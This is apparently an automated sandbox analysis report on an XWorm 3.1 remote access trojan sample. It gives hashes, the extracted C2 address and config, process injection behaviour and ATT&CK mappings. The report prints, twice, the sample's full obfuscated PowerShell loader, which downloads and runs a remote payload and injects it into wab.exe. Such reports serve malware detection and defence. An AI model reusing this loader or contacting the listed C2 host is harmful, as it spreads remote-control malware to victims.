xworm | 76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6

General

Target

xff.cmd
Size

6KB
MD5

798c0f3c0c128497007a0616ef8d6b93
SHA1

cedbb573042a3275475973d0a6d45510a1941cd1
SHA256

76611689034914a32d83d3fafbd528f7498fcd80a78c19fb2d8e93f39ce14dc6
SHA512

f64eafe2d84b867ced4c430743cdfb3a4be3eac0a2d4a53114e9a815ebe5e4a5e94e4d7eed6d8ae647d25191994d88a7ae826717c50fc9e14c7a4de866868999
SSDEEP

192:wTcnW0e8ORczJDWx3CDKZJ4VKwUg9j16NuK:meC89VDWxUKZJm5p1/K

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

nmds.duckdns.org:8895

Mutex

O3B5rRVaa3oX74CD

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1592-87-0x0000000000940000-0x000000000094E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 1664 powershell.exe
7 1664 powershell.exe
9 1664 powershell.exe
11 1664 powershell.exe
13 1664 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1664 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

1592 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

3008 powershell.exe
1592 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3008 set thread context of 1592 3008 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

1664 powershell.exe
3008 powershell.exe
3008 powershell.exe
1592 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

3008 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1664 powershell.exe
Token: SeDebugPrivilege 3008 powershell.exe
Token: SeDebugPrivilege 1592 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

1592 wab.exe

flow	pid	process
5	1664	powershell.exe
7	1664	powershell.exe
9	1664	powershell.exe
11	1664	powershell.exe
13	1664	powershell.exe

pid	process
1664	powershell.exe

pid	process
1592	wab.exe

pid	process
3008	powershell.exe
1592	wab.exe

description	pid	process	target process
PID 3008 set thread context of 1592	3008	powershell.exe	wab.exe

pid	process
1664	powershell.exe
3008	powershell.exe
3008	powershell.exe
1592	wab.exe

pid	process
3008	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1592	wab.exe

pid	process
1592	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 764 wrote to memory of 1664	764	cmd.exe	powershell.exe
PID 764 wrote to memory of 1664	764	cmd.exe	powershell.exe
PID 764 wrote to memory of 1664	764	cmd.exe	powershell.exe
PID 1664 wrote to memory of 2560	1664	powershell.exe	cmd.exe
PID 1664 wrote to memory of 2560	1664	powershell.exe	cmd.exe
PID 1664 wrote to memory of 2560	1664	powershell.exe	cmd.exe
PID 1664 wrote to memory of 3008	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 3008	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 3008	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 3008	1664	powershell.exe	powershell.exe
PID 3008 wrote to memory of 2796	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 2796	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 2796	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 2796	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe
PID 3008 wrote to memory of 1592	3008	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
3⤵
PID:2560

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
4⤵
PID:2796

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b79352d148d9134239a5e811ce2ac0a0

SHA1
ba2ec5c1566e97867935c075e8c8e29f32e83bb3

SHA256
509ecce0e8d628dde6a6083a7e92486051e2ed7a5711cf0a81e766db733a3b87

SHA512
45b7e8d55d6b8cc9fb056694ec43e2bbe0c047afcfeea5eb98808b1aece748cf0c1f85a71e74543673fc06ce2e710d3168b1b507a181c55efdb2fec118d6ed80

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2C65.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QZU9LX8O2VVWK9YZMZ9Q.temp
Filesize
7KB

MD5
e78ea5bbc1a886ecd2ea2313d57ae969

SHA1
82d6e08155001d7ac46f7917d4e1cab13b5bd579

SHA256
9195e31043441d9bea6ebea3b07cafae6d99b56524225e7bb65df28774755788

SHA512
21f9b72436b3a9b8915539b9d19658caad02c4b36228b2796d0304710f3d16018db99f8e69476cb4b56317380d969cd657ce09bf2d816dadf868b7b5de25fe14

Download Submit
C:\Users\Admin\AppData\Roaming\Tider.Dre
Filesize
455KB

MD5
b3908211a29c523da70d8ce9797a087a

SHA1
c99a1d080cb474fd51dbd51f75b753d0efb5d17a

SHA256
15b86fe8ba861e241bd317292e649ee349f0a35c0e2ddb4669989e907689e128

SHA512
dff97fd11075c912f6aea454d2fac846787fb3747c92a0270cd212391c693cc8b9d3495ebb9c416f71d41d935c99e6f37ca9eb4767ccb808dc1a985278095fa4

Download Submit
memory/1592-85-0x0000000000940000-0x00000000019A2000-memory.dmp

Filesize
16.4MB

Download
memory/1592-87-0x0000000000940000-0x000000000094E000-memory.dmp

Filesize
56KB

Download
memory/1664-8-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/1664-7-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/1664-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/1664-4-0x000007FEF5FEE000-0x000007FEF5FEF000-memory.dmp

Filesize
4KB

Download
memory/1664-56-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/1664-57-0x000007FEF5FEE000-0x000007FEF5FEF000-memory.dmp

Filesize
4KB

Download
memory/1664-5-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/1664-86-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-55-0x0000000006450000-0x0000000009275000-memory.dmp

Filesize
46.1MB

Download

Analysis

Sharing